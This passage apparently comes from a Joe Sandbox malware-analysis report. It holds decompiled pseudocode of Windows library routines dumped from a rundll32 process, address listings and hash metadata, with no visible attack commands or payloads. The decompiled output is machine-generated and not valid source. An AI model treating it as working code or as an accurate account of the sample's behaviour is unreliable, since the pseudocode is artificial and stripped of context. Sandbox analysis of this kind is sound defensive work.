																			L045F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t324);
																		}
																	} else {
																		 *(_t306 + 0xc) = _t324;
																		 *((intOrPtr*)(_t306 + 8)) =  *((intOrPtr*)(_t324 + 4));
																	}
																	goto L38;
																}
															}
															goto L41;
														}
													}
													L38:
													_t322 = 0;
												}
											}
										}
									}
									L39:
									if(_t254 !=  &_v532) {
										L045F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t254);
									}
									_t169 = _t322;
								}
								goto L41;
							}
							goto L68;
						}
					}
					L41:
					_pop(_t317);
					_pop(_t323);
					_pop(_t255);
					return E0461B640(_t169, _t255, _v8 ^ _t329, _t306, _t317, _t323);
				} else {
					_t299 = __edx[2];
					if( *_t299 == 0x5c) {
						_t256 =  *(_t299 + 2) & 0x0000ffff;
						if(_t256 != 0x5c) {
							if(_t256 != 0x3f) {
								goto L2;
							} else {
								goto L50;
							}
						} else {
							L50:
							if( *((short*)(_t299 + 4)) != 0x3f ||  *((short*)(_t299 + 6)) != 0x5c) {
								goto L2;
							} else {
								_t251 = E04613D43(_t315, _t321, _t157, _v560, _v572, _t305);
								_pop(_t319);
								_pop(_t326);
								_pop(_t257);
								return E0461B640(_t251, _t257, _v24 ^ _t329, _t321, _t319, _t326);
							}
						}
					} else {
						L2:
						_t260 = _v572;
						goto L3;
					}
				}
				L101:
			}















































































                                                                                            0x045f4128
                                                                                            0x045f4135
                                                                                            0x045f413c
                                                                                            0x045f4141
                                                                                            0x045f4145
                                                                                            0x045f4147
                                                                                            0x045f414e
                                                                                            0x045f4151
                                                                                            0x045f4159
                                                                                            0x045f415c
                                                                                            0x045f4160
                                                                                            0x045f4164
                                                                                            0x045f4168
                                                                                            0x045f416c
                                                                                            0x045f417f
                                                                                            0x045f4181
                                                                                            0x045f446a
                                                                                            0x045f446a
                                                                                            0x045f418c
                                                                                            0x045f4195
                                                                                            0x045f4199
                                                                                            0x045f4432
                                                                                            0x045f4439
                                                                                            0x045f443d
                                                                                            0x045f4442
                                                                                            0x045f4447
                                                                                            0x00000000
                                                                                            0x045f419f
                                                                                            0x045f41a3
                                                                                            0x045f41b1
                                                                                            0x045f41b9
                                                                                            0x045f41bd
                                                                                            0x045f45db
                                                                                            0x045f45db
                                                                                            0x00000000
                                                                                            0x045f41c3
                                                                                            0x045f41c3
                                                                                            0x045f41ce
                                                                                            0x045f41d4
                                                                                            0x0463e138
                                                                                            0x0463e13e
                                                                                            0x0463e169
                                                                                            0x0463e16d
                                                                                            0x0463e19e
                                                                                            0x0463e16f
                                                                                            0x0463e16f
                                                                                            0x0463e175
                                                                                            0x0463e179
                                                                                            0x0463e18f
                                                                                            0x0463e193
                                                                                            0x00000000
                                                                                            0x0463e199
                                                                                            0x00000000
                                                                                            0x0463e199
                                                                                            0x0463e193
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x045f41da
                                                                                            0x045f41da
                                                                                            0x045f41df
                                                                                            0x045f41e4
                                                                                            0x045f41ec
                                                                                            0x045f4203
                                                                                            0x045f4207
                                                                                            0x0463e1fd
                                                                                            0x045f4222
                                                                                            0x045f4226
                                                                                            0x0463e1f3
                                                                                            0x0463e1f3
                                                                                            0x045f422c
                                                                                            0x045f422c
                                                                                            0x045f4233
                                                                                            0x0463e1ed
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x045f4239
                                                                                            0x045f4239
                                                                                            0x045f4239
                                                                                            0x045f4239
                                                                                            0x045f4233
                                                                                            0x045f4226
                                                                                            0x045f41ee
                                                                                            0x045f41ee
                                                                                            0x045f41f4
                                                                                            0x045f4575
                                                                                            0x0463e1b1
                                                                                            0x0463e1b1
                                                                                            0x00000000
                                                                                            0x045f457b
                                                                                            0x045f457b
                                                                                            0x045f4582
                                                                                            0x0463e1ab
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x045f4588
                                                                                            0x045f4588
                                                                                            0x045f458c
                                                                                            0x0463e1c4
                                                                                            0x0463e1c4
                                                                                            0x00000000
                                                                                            0x045f4592
                                                                                            0x045f4592
                                                                                            0x045f4599
                                                                                            0x0463e1be
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x045f459f
                                                                                            0x045f459f
                                                                                            0x045f45a3
                                                                                            0x0463e1d7
                                                                                            0x0463e1e4
                                                                                            0x00000000
                                                                                            0x045f45a9
                                                                                            0x045f45a9
                                                                                            0x045f45b0
                                                                                            0x0463e1d1
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x045f45b6
                                                                                            0x045f45b6
                                                                                            0x045f45b6
                                                                                            0x00000000
                                                                                            0x045f45b6
                                                                                            0x045f45b0
                                                                                            0x045f45a3
                                                                                            0x045f4599
                                                                                            0x045f458c
                                                                                            0x045f4582
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x045f41f4
                                                                                            0x045f423e
                                                                                            0x045f4241
                                                                                            0x045f45c0
                                                                                            0x045f45c4
                                                                                            0x00000000
                                                                                            0x045f45ca
                                                                                            0x045f45ca
                                                                                            0x00000000
                                                                                            0x0463e207
                                                                                            0x0463e20f
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x045f45d1
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x045f45ca
                                                                                            0x00000000
                                                                                            0x045f4247
                                                                                            0x045f4247
                                                                                            0x045f4247
                                                                                            0x045f4249
                                                                                            0x045f4249
                                                                                            0x045f4249
                                                                                            0x045f4251
                                                                                            0x045f4251
                                                                                            0x045f4257
                                                                                            0x045f425f
                                                                                            0x045f426e
                                                                                            0x045f4270
                                                                                            0x045f427a
                                                                                            0x0463e219
                                                                                            0x0463e219
                                                                                            0x045f4280
                                                                                            0x045f4282
                                                                                            0x045f4456
                                                                                            0x045f45ea
                                                                                            0x00000000
                                                                                            0x045f45f0
                                                                                            0x0463e223
                                                                                            0x00000000
                                                                                            0x0463e223
                                                                                            0x045f445c
                                                                                            0x045f445c
                                                                                            0x00000000
                                                                                            0x045f445c
                                                                                            0x00000000
                                                                                            0x045f4288
                                                                                            0x045f428c
                                                                                            0x0463e298
                                                                                            0x045f4292
                                                                                            0x045f4292
                                                                                            0x045f429e
                                                                                            0x045f42a3
                                                                                            0x045f42a7
                                                                                            0x045f42ac
                                                                                            0x0463e22d
                                                                                            0x045f42b2
                                                                                            0x045f42b2
                                                                                            0x045f42b9
                                                                                            0x045f42bc
                                                                                            0x045f42c2
                                                                                            0x045f42ca
                                                                                            0x045f42cd
                                                                                            0x045f42cd
                                                                                            0x045f42d4
                                                                                            0x045f433f
                                                                                            0x045f433f
                                                                                            0x045f42d6
                                                                                            0x045f42d6
                                                                                            0x045f42d9
                                                                                            0x045f42dd
                                                                                            0x045f42eb
                                                                                            0x0463e23a
                                                                                            0x045f42f1
                                                                                            0x045f4305
                                                                                            0x045f430d
                                                                                            0x045f4315
                                                                                            0x045f4318
                                                                                            0x045f431f
                                                                                            0x045f4322
                                                                                            0x045f432e
                                                                                            0x045f433b
                                                                                            0x045f433b
                                                                                            0x00000000
                                                                                            0x045f432e
                                                                                            0x045f42eb
                                                                                            0x045f434c
                                                                                            0x045f434e
                                                                                            0x045f4352
                                                                                            0x045f4359
                                                                                            0x045f435e
                                                                                            0x045f4361
                                                                                            0x045f436e
                                                                                            0x045f438a
                                                                                            0x045f438e
                                                                                            0x045f4396
                                                                                            0x045f439e
                                                                                            0x045f43a1
                                                                                            0x045f43ad
                                                                                            0x045f43bb
                                                                                            0x045f43bb
                                                                                            0x045f43ad
                                                                                            0x045f436e
                                                                                            0x045f43bf
                                                                                            0x045f43c5
                                                                                            0x045f4463
                                                                                            0x045f4463
                                                                                            0x045f43ce
                                                                                            0x045f43d5
                                                                                            0x045f43d9
                                                                                            0x045f43df
                                                                                            0x045f4475
                                                                                            0x045f4479
                                                                                            0x045f4491
                                                                                            0x045f4491
                                                                                            0x045f4479
                                                                                            0x045f43e5
                                                                                            0x045f43eb
                                                                                            0x045f43f4
                                                                                            0x045f43f6
                                                                                            0x045f43f9
                                                                                            0x045f43fc
                                                                                            0x045f43ff
                                                                                            0x045f44e8
                                                                                            0x045f44ed
                                                                                            0x045f44f3
                                                                                            0x0463e247
                                                                                            0x00000000
                                                                                            0x045f44f9
                                                                                            0x045f4504
                                                                                            0x045f4508
                                                                                            0x045f450f
                                                                                            0x0463e269
                                                                                            0x00000000
                                                                                            0x045f4515
                                                                                            0x045f4519
                                                                                            0x045f4531
                                                                                            0x045f4534
                                                                                            0x045f4537
                                                                                            0x045f453e
                                                                                            0x045f4541
                                                                                            0x045f454a
                                                                                            0x0463e255
                                                                                            0x0463e255
                                                                                            0x0463e25b
                                                                                            0x0463e25e
                                                                                            0x0463e261
                                                                                            0x0463e261
                                                                                            0x045f4555
                                                                                            0x045f4559
                                                                                            0x045f455d
                                                                                            0x0463e26d
                                                                                            0x0463e270
                                                                                            0x0463e274
                                                                                            0x0463e27a
                                                                                            0x0463e27d
                                                                                            0x0463e28e
                                                                                            0x0463e28e
                                                                                            0x045f4563
                                                                                            0x045f4563
                                                                                            0x045f4569
                                                                                            0x045f4569
                                                                                            0x00000000
                                                                                            0x045f455d
                                                                                            0x045f450f
                                                                                            0x00000000
                                                                                            0x045f44f3
                                                                                            0x045f43ff
                                                                                            0x045f4405
                                                                                            0x045f4405
                                                                                            0x045f4405
                                                                                            0x045f42ac
                                                                                            0x045f428c
                                                                                            0x045f4282
                                                                                            0x045f4407
                                                                                            0x045f440d
                                                                                            0x0463e2af
                                                                                            0x0463e2af
                                                                                            0x045f4413
                                                                                            0x045f4413
                                                                                            0x00000000
                                                                                            0x045f41d4
                                                                                            0x00000000
                                                                                            0x045f41c3
                                                                                            0x045f41bd
                                                                                            0x045f4415
                                                                                            0x045f4415
                                                                                            0x045f4416
                                                                                            0x045f4417
                                                                                            0x045f4429
                                                                                            0x045f416e
                                                                                            0x045f416e
                                                                                            0x045f4175
                                                                                            0x045f4498
                                                                                            0x045f449f
                                                                                            0x0463e12d
                                                                                            0x00000000
                                                                                            0x0463e133
                                                                                            0x00000000
                                                                                            0x0463e133
                                                                                            0x045f44a5
                                                                                            0x045f44a5
                                                                                            0x045f44aa
                                                                                            0x00000000
                                                                                            0x045f44bb
                                                                                            0x045f44ca
                                                                                            0x045f44d6
                                                                                            0x045f44d7
                                                                                            0x045f44d8
                                                                                            0x045f44e3
                                                                                            0x045f44e3
                                                                                            0x045f44aa
                                                                                            0x045f417b
                                                                                            0x045f417b
                                                                                            0x045f417b
                                                                                            0x00000000
                                                                                            0x045f417b
                                                                                            0x045f4175
                                                                                            0x00000000

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: c2d84704e617c709bdca27a01d0e5017f7437f2f38c8d3c5eb2292e31154ce81
                                                                                            • Instruction ID: a7c75e2455056d0ad4a9a2031e53a09a1ca67470cc35d84ee05df9e1ad21e81e
                                                                                            • Opcode Fuzzy Hash: c2d84704e617c709bdca27a01d0e5017f7437f2f38c8d3c5eb2292e31154ce81
                                                                                            • Instruction Fuzzy Hash: 7BF18D706082518BD724CF59C884A3BB7E1FFA9708F04492EF586CB390E735E885EB52
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 046020A0 Relevance: .4, Instructions: 420COMMONCrypto
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 92%
                                                                                            			E046020A0(void* __ebx, unsigned int __ecx, signed int __edx, void* __eflags, intOrPtr* _a4, signed int _a8, intOrPtr* _a12, void* _a16, intOrPtr* _a20) {
				signed int _v16;
				signed int _v20;
				signed char _v24;
				intOrPtr _v28;
				signed int _v32;
				void* _v36;
				char _v48;
				signed int _v52;
				signed int _v56;
				unsigned int _v60;
				char _v64;
				unsigned int _v68;
				signed int _v72;
				char _v73;
				signed int _v74;
				char _v75;
				signed int _v76;
				void* _v81;
				void* _v82;
				void* _v89;
				void* _v92;
				void* _v97;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char _t128;
				void* _t129;
				signed int _t130;
				void* _t132;
				signed char _t133;
				intOrPtr _t135;
				signed int _t137;
				signed int _t140;
				signed int* _t144;
				signed int* _t145;
				intOrPtr _t146;
				signed int _t147;
				signed char* _t148;
				signed int _t149;
				signed int _t153;
				signed int _t169;
				signed int _t174;
				signed int _t180;
				void* _t197;
				void* _t198;
				signed int _t201;
				intOrPtr* _t202;
				intOrPtr* _t205;
				signed int _t210;
				signed int _t215;
				signed int _t218;
				signed char _t221;
				signed int _t226;
				char _t227;
				signed int _t228;
				void* _t229;
				unsigned int _t231;
				void* _t235;
				signed int _t240;
				signed int _t241;
				void* _t242;
				signed int _t246;
				signed int _t248;
				signed int _t252;
				signed int _t253;
				void* _t254;
				intOrPtr* _t256;
				intOrPtr _t257;
				unsigned int _t262;
				signed int _t265;
				void* _t267;
				signed int _t275;

				_t198 = __ebx;
				_t267 = (_t265 & 0xfffffff0) - 0x48;
				_v68 = __ecx;
				_v73 = 0;
				_t201 = __edx & 0x00002000;
				_t128 = __edx & 0xffffdfff;
				_v74 = __edx & 0xffffff00 | __eflags != 0x00000000;
				_v72 = _t128;
				if((_t128 & 0x00000008) != 0) {
					__eflags = _t128 - 8;
					if(_t128 != 8) {
						L69:
						_t129 = 0xc000000d;
						goto L23;
					} else {
						_t130 = 0;
						_v72 = 0;
						_v75 = 1;
						L2:
						_v74 = 1;
						_t226 =  *0x46c8714; // 0x0
						if(_t226 != 0) {
							__eflags = _t201;
							if(_t201 != 0) {
								L62:
								_v74 = 1;
								L63:
								_t130 = _t226 & 0xffffdfff;
								_v72 = _t130;
								goto L3;
							}
							_v74 = _t201;
							__eflags = _t226 & 0x00002000;
							if((_t226 & 0x00002000) == 0) {
								goto L63;
							}
							goto L62;
						}
						L3:
						_t227 = _v75;
						L4:
						_t240 = 0;
						_v56 = 0;
						_t252 = _t130 & 0x00000100;
						if(_t252 != 0 || _t227 != 0) {
							_t240 = _v68;
							_t132 = E04602EB0(_t240);
							__eflags = _t132 - 2;
							if(_t132 != 2) {
								__eflags = _t132 - 1;
								if(_t132 == 1) {
									goto L25;
								}
								__eflags = _t132 - 6;
								if(_t132 == 6) {
									__eflags =  *((short*)(_t240 + 4)) - 0x3f;
									if( *((short*)(_t240 + 4)) != 0x3f) {
										goto L40;
									}
									_t197 = E04602EB0(_t240 + 8);
									__eflags = _t197 - 2;
									if(_t197 == 2) {
										goto L25;
									}
								}
								L40:
								_t133 = 1;
								L26:
								_t228 = _v75;
								_v56 = _t240;
								__eflags = _t133;
								if(_t133 != 0) {
									__eflags = _t228;
									if(_t228 == 0) {
										L43:
										__eflags = _v72;
										if(_v72 == 0) {
											goto L8;
										}
										goto L69;
									}
									_t133 = E045D58EC(_t240);
									_t221 =  *0x46c5cac; // 0x16
									__eflags = _t221 & 0x00000040;
									if((_t221 & 0x00000040) != 0) {
										_t228 = 0;
										__eflags = _t252;
										if(_t252 != 0) {
											goto L43;
										}
										_t133 = _v72;
										goto L7;
									}
									goto L43;
								} else {
									_t133 = _v72;
									goto L6;
								}
							}
							L25:
							_t133 = _v73;
							goto L26;
						} else {
							L6:
							_t221 =  *0x46c5cac; // 0x16
							L7:
							if(_t133 != 0) {
								__eflags = _t133 & 0x00001000;
								if((_t133 & 0x00001000) != 0) {
									_t133 = _t133 | 0x00000a00;
									__eflags = _t221 & 0x00000004;
									if((_t221 & 0x00000004) != 0) {
										_t133 = _t133 | 0x00000400;
									}
								}
								__eflags = _t228;
								if(_t228 != 0) {
									_t133 = _t133 | 0x00000100;
								}
								_t229 = E04614A2C(0x46c6e40, 0x4614b30, _t133, _t240);
								__eflags = _t229;
								if(_t229 == 0) {
									_t202 = _a20;
									goto L100;
								} else {
									_t135 =  *((intOrPtr*)(_t229 + 0x38));
									L15:
									_t202 = _a20;
									 *_t202 = _t135;
									if(_t229 == 0) {
										L100:
										 *_a4 = 0;
										_t137 = _a8;
										__eflags = _t137;
										if(_t137 != 0) {
											 *_t137 = 0;
										}
										 *_t202 = 0;
										_t129 = 0xc0000017;
										goto L23;
									} else {
										_t242 = _a16;
										if(_t242 != 0) {
											_t254 = _t229;
											memcpy(_t242, _t254, 0xd << 2);
											_t267 = _t267 + 0xc;
											_t242 = _t254 + 0x1a;
										}
										_t205 = _a4;
										_t25 = _t229 + 0x48; // 0x48
										 *_t205 = _t25;
										_t140 = _a8;
										if(_t140 != 0) {
											__eflags =  *((char*)(_t267 + 0xa));
											if( *((char*)(_t267 + 0xa)) != 0) {
												 *_t140 =  *((intOrPtr*)(_t229 + 0x44));
											} else {
												 *_t140 = 0;
											}
										}
										_t256 = _a12;
										if(_t256 != 0) {
											 *_t256 =  *((intOrPtr*)(_t229 + 0x3c));
										}
										_t257 =  *_t205;
										_v48 = 0;
										 *((intOrPtr*)(_t267 + 0x2c)) = 0;
										_v56 = 0;
										_v52 = 0;
										_t144 =  *( *[fs:0x30] + 0x50);
										if(_t144 != 0) {
											__eflags =  *_t144;
											if( *_t144 == 0) {
												goto L20;
											}
											_t145 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
											goto L21;
										} else {
											L20:
											_t145 = 0x7ffe0384;
											L21:
											if( *_t145 != 0) {
												_t146 =  *[fs:0x30];
												__eflags =  *(_t146 + 0x240) & 0x00000004;
												if(( *(_t146 + 0x240) & 0x00000004) != 0) {
													_t147 = E045F7D50();
													__eflags = _t147;
													if(_t147 == 0) {
														_t148 = 0x7ffe0385;
													} else {
														_t148 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
													}
													__eflags =  *_t148 & 0x00000020;
													if(( *_t148 & 0x00000020) != 0) {
														_t149 = _v72;
														__eflags = _t149;
														if(__eflags == 0) {
															_t149 = 0x45b5c80;
														}
														_push(_t149);
														_push( &_v48);
														 *((char*)(_t267 + 0xb)) = E0460F6E0(_t198, _t242, _t257, __eflags);
														_push(_t257);
														_push( &_v64);
														_t153 = E0460F6E0(_t198, _t242, _t257, __eflags);
														__eflags =  *((char*)(_t267 + 0xb));
														if( *((char*)(_t267 + 0xb)) != 0) {
															__eflags = _t153;
															if(_t153 != 0) {
																__eflags = 0;
																E04657016(0x14c1, 0, 0, 0,  &_v72,  &_v64);
																L045F2400(_t267 + 0x20);
															}
															L045F2400( &_v64);
														}
													}
												}
											}
											_t129 = 0;
											L23:
											return _t129;
										}
									}
								}
							}
							L8:
							_t275 = _t240;
							if(_t275 != 0) {
								_v73 = 0;
								_t253 = 0;
								__eflags = 0;
								L29:
								_push(0);
								_t241 = E04602397(_t240);
								__eflags = _t241;
								if(_t241 == 0) {
									_t229 = 0;
									L14:
									_t135 = 0;
									goto L15;
								}
								__eflags =  *((char*)(_t267 + 0xb));
								 *(_t241 + 0x34) = 1;
								if( *((char*)(_t267 + 0xb)) != 0) {
									E045F2280(_t134, 0x46c8608);
									__eflags =  *0x46c6e48 - _t253; // 0x29fd6a8
									if(__eflags != 0) {
										L48:
										_t253 = 0;
										__eflags = 0;
										L49:
										E045EFFB0(_t198, _t241, 0x46c8608);
										__eflags = _t253;
										if(_t253 != 0) {
											L045F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t253);
										}
										goto L31;
									}
									 *0x46c6e48 = _t241;
									 *(_t241 + 0x34) =  *(_t241 + 0x34) + 1;
									__eflags = _t253;
									if(_t253 != 0) {
										_t57 = _t253 + 0x34;
										 *_t57 =  *(_t253 + 0x34) + 0xffffffff;
										__eflags =  *_t57;
										if( *_t57 == 0) {
											goto L49;
										}
									}
									goto L48;
								}
								L31:
								_t229 = _t241;
								goto L14;
							}
							_v73 = 1;
							_v64 = _t240;
							asm("lock bts dword [esi], 0x0");
							if(_t275 < 0) {
								_t231 =  *0x46c8608; // 0x0
								while(1) {
									_v60 = _t231;
									__eflags = _t231 & 0x00000001;
									if((_t231 & 0x00000001) != 0) {
										goto L76;
									}
									_t73 = _t231 + 1; // 0x1
									_t210 = _t73;
									asm("lock cmpxchg [edi], ecx");
									__eflags = _t231 - _t231;
									if(_t231 != _t231) {
										L92:
										_t133 = E04606B90(_t210,  &_v64);
										_t262 =  *0x46c8608; // 0x0
										L93:
										_t231 = _t262;
										continue;
									}
									_t240 = _v56;
									goto L10;
									L76:
									_t169 = E0460E180(_t133);
									__eflags = _t169;
									if(_t169 != 0) {
										_push(0xc000004b);
										_push(0xffffffff);
										E046197C0();
										_t231 = _v68;
									}
									_v72 = 0;
									_v24 =  *( *[fs:0x18] + 0x24);
									_v16 = 3;
									_v28 = 0;
									__eflags = _t231 & 0x00000002;
									if((_t231 & 0x00000002) == 0) {
										_v32 =  &_v36;
										_t174 = _t231 >> 4;
										__eflags = 1 - _t174;
										_v20 = _t174;
										asm("sbb ecx, ecx");
										_t210 = 3 |  &_v36;
										__eflags = _t174;
										if(_t174 == 0) {
											_v20 = 0xfffffffe;
										}
									} else {
										_v32 = 0;
										_v20 = 0xffffffff;
										_v36 = _t231 & 0xfffffff0;
										_t210 = _t231 & 0x00000008 |  &_v36 | 0x00000007;
										_v72 =  !(_t231 >> 2) & 0xffffff01;
									}
									asm("lock cmpxchg [edi], esi");
									_t262 = _t231;
									__eflags = _t262 - _t231;
									if(_t262 != _t231) {
										goto L92;
									} else {
										__eflags = _v72;
										if(_v72 != 0) {
											E0461006A(0x46c8608, _t210);
										}
										__eflags =  *0x7ffe036a - 1;
										if(__eflags <= 0) {
											L89:
											_t133 =  &_v16;
											asm("lock btr dword [eax], 0x1");
											if(__eflags >= 0) {
												goto L93;
											} else {
												goto L90;
											}
											do {
												L90:
												_push(0);
												_push(0x46c8608);
												E0461B180();
												_t133 = _v24;
												__eflags = _t133 & 0x00000004;
											} while ((_t133 & 0x00000004) == 0);
											goto L93;
										} else {
											_t218 =  *0x46c6904; // 0x400
											__eflags = _t218;
											if(__eflags == 0) {
												goto L89;
											} else {
												goto L87;
											}
											while(1) {
												L87:
												__eflags = _v16 & 0x00000002;
												if(__eflags == 0) {
													goto L89;
												}
												asm("pause");
												_t218 = _t218 - 1;
												__eflags = _t218;
												if(__eflags != 0) {
													continue;
												}
												goto L89;
											}
											goto L89;
										}
									}
								}
							}
							L10:
							_t229 =  *0x46c6e48; // 0x29fd6a8
							_v72 = _t229;
							if(_t229 == 0) {
								L45:
								E045EFFB0(_t198, _t240, 0x46c8608);
								_t253 = _v76;
								goto L29;
							}
							if( *((char*)(_t229 + 0x40)) != 0) {
								L13:
								 *((intOrPtr*)(_t229 + 0x34)) =  *((intOrPtr*)(_t229 + 0x34)) + 1;
								asm("lock cmpxchg [esi], ecx");
								_t215 = 1;
								if(1 != 1) {
									while(1) {
										_t246 = _t215 & 0x00000006;
										_t180 = _t215;
										__eflags = _t246 - 2;
										_v56 = _t246;
										_t235 = (0 | _t246 == 0x00000002) * 4 - 1 + _t215;
										asm("lock cmpxchg [edi], esi");
										_t248 = _v56;
										__eflags = _t180 - _t215;
										if(_t180 == _t215) {
											break;
										}
										_t215 = _t180;
									}
									__eflags = _t248 - 2;
									if(_t248 == 2) {
										__eflags = 0;
										E046100C2(0x46c8608, 0, _t235);
									}
									_t229 = _v72;
								}
								goto L14;
							}
							_t18 = _t229 + 0x38; // 0x9
							if( *_t18 !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
								goto L45;
							}
							goto L13;
						}
					}
				}
				_t227 = 0;
				_v75 = 0;
				if(_t128 != 0) {
					goto L4;
				}
				goto L2;
			}











































































                                                                                            0x046020a0
                                                                                            0x046020a8
                                                                                            0x046020ad
                                                                                            0x046020b3
                                                                                            0x046020b8
                                                                                            0x046020c2
                                                                                            0x046020c7
                                                                                            0x046020cb
                                                                                            0x046020d2
                                                                                            0x04602263
                                                                                            0x04602266
                                                                                            0x04645836
                                                                                            0x04645836
                                                                                            0x00000000
                                                                                            0x0460226c
                                                                                            0x0460226c
                                                                                            0x04602270
                                                                                            0x04602274
                                                                                            0x046020e2
                                                                                            0x046020e2
                                                                                            0x046020e6
                                                                                            0x046020ee
                                                                                            0x046457dc
                                                                                            0x046457de
                                                                                            0x046457ec
                                                                                            0x046457ec
                                                                                            0x046457f1
                                                                                            0x046457f3
                                                                                            0x046457f8
                                                                                            0x00000000
                                                                                            0x046457f8
                                                                                            0x046457e0
                                                                                            0x046457e4
                                                                                            0x046457ea
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x046457ea
                                                                                            0x046020f4
                                                                                            0x046020f4
                                                                                            0x046020f8
                                                                                            0x046020f8
                                                                                            0x046020fc
                                                                                            0x04602100
                                                                                            0x04602106
                                                                                            0x04602201
                                                                                            0x04602206
                                                                                            0x0460220b
                                                                                            0x0460220e
                                                                                            0x046022a9
                                                                                            0x046022ac
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x046022b2
                                                                                            0x046022b5
                                                                                            0x04645801
                                                                                            0x04645806
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04645810
                                                                                            0x04645815
                                                                                            0x04645818
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0464581e
                                                                                            0x046022bb
                                                                                            0x046022bb
                                                                                            0x04602218
                                                                                            0x04602218
                                                                                            0x0460221c
                                                                                            0x04602220
                                                                                            0x04602222
                                                                                            0x046022c2
                                                                                            0x046022c4
                                                                                            0x046022dc
                                                                                            0x046022dc
                                                                                            0x046022e1
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x046022e7
                                                                                            0x046022c8
                                                                                            0x046022cd
                                                                                            0x046022d3
                                                                                            0x046022d6
                                                                                            0x04645823
                                                                                            0x04645825
                                                                                            0x04645827
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0464582d
                                                                                            0x00000000
                                                                                            0x0464582d
                                                                                            0x00000000
                                                                                            0x04602228
                                                                                            0x04602228
                                                                                            0x00000000
                                                                                            0x04602228
                                                                                            0x04602222
                                                                                            0x04602214
                                                                                            0x04602214
                                                                                            0x00000000
                                                                                            0x04602114
                                                                                            0x04602114
                                                                                            0x04602114
                                                                                            0x0460211a
                                                                                            0x0460211c
                                                                                            0x04602348
                                                                                            0x0460234d
                                                                                            0x04645840
                                                                                            0x04645845
                                                                                            0x04645848
                                                                                            0x0464584e
                                                                                            0x0464584e
                                                                                            0x04645848
                                                                                            0x04602353
                                                                                            0x04602355
                                                                                            0x04602388
                                                                                            0x04602388
                                                                                            0x04602368
                                                                                            0x0460236a
                                                                                            0x0460236c
                                                                                            0x0460238f
                                                                                            0x00000000
                                                                                            0x0460236e
                                                                                            0x0460236e
                                                                                            0x0460218e
                                                                                            0x0460218e
                                                                                            0x04602191
                                                                                            0x04602195
                                                                                            0x04645a03
                                                                                            0x04645a06
                                                                                            0x04645a0c
                                                                                            0x04645a0f
                                                                                            0x04645a11
                                                                                            0x04645a13
                                                                                            0x04645a13
                                                                                            0x04645a19
                                                                                            0x04645a1f
                                                                                            0x00000000
                                                                                            0x0460219b
                                                                                            0x0460219b
                                                                                            0x046021a0
                                                                                            0x04602282
                                                                                            0x04602284
                                                                                            0x04602284
                                                                                            0x04602284
                                                                                            0x04602284
                                                                                            0x046021a6
                                                                                            0x046021a9
                                                                                            0x046021ac
                                                                                            0x046021ae
                                                                                            0x046021b3
                                                                                            0x0460228b
                                                                                            0x04602290
                                                                                            0x04602379
                                                                                            0x04602296
                                                                                            0x04602298
                                                                                            0x04602298
                                                                                            0x04602290
                                                                                            0x046021b9
                                                                                            0x046021be
                                                                                            0x046022a2
                                                                                            0x046022a2
                                                                                            0x046021c4
                                                                                            0x046021c8
                                                                                            0x046021cc
                                                                                            0x046021d0
                                                                                            0x046021d4
                                                                                            0x046021de
                                                                                            0x046021e3
                                                                                            0x04645a29
                                                                                            0x04645a2c
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04645a3b
                                                                                            0x00000000
                                                                                            0x046021e9
                                                                                            0x046021e9
                                                                                            0x046021e9
                                                                                            0x046021ee
                                                                                            0x046021f1
                                                                                            0x04645a45
                                                                                            0x04645a4b
                                                                                            0x04645a52
                                                                                            0x04645a58
                                                                                            0x04645a5d
                                                                                            0x04645a5f
                                                                                            0x04645a71
                                                                                            0x04645a61
                                                                                            0x04645a6a
                                                                                            0x04645a6a
                                                                                            0x04645a76
                                                                                            0x04645a79
                                                                                            0x04645a7f
                                                                                            0x04645a83
                                                                                            0x04645a85
                                                                                            0x04645a87
                                                                                            0x04645a87
                                                                                            0x04645a8c
                                                                                            0x04645a91
                                                                                            0x04645a97
                                                                                            0x04645a9f
                                                                                            0x04645aa0
                                                                                            0x04645aa1
                                                                                            0x04645aa6
                                                                                            0x04645aab
                                                                                            0x04645ab1
                                                                                            0x04645ab3
                                                                                            0x04645ab9
                                                                                            0x04645aca
                                                                                            0x04645ad4
                                                                                            0x04645ad4
                                                                                            0x04645ade
                                                                                            0x04645ade
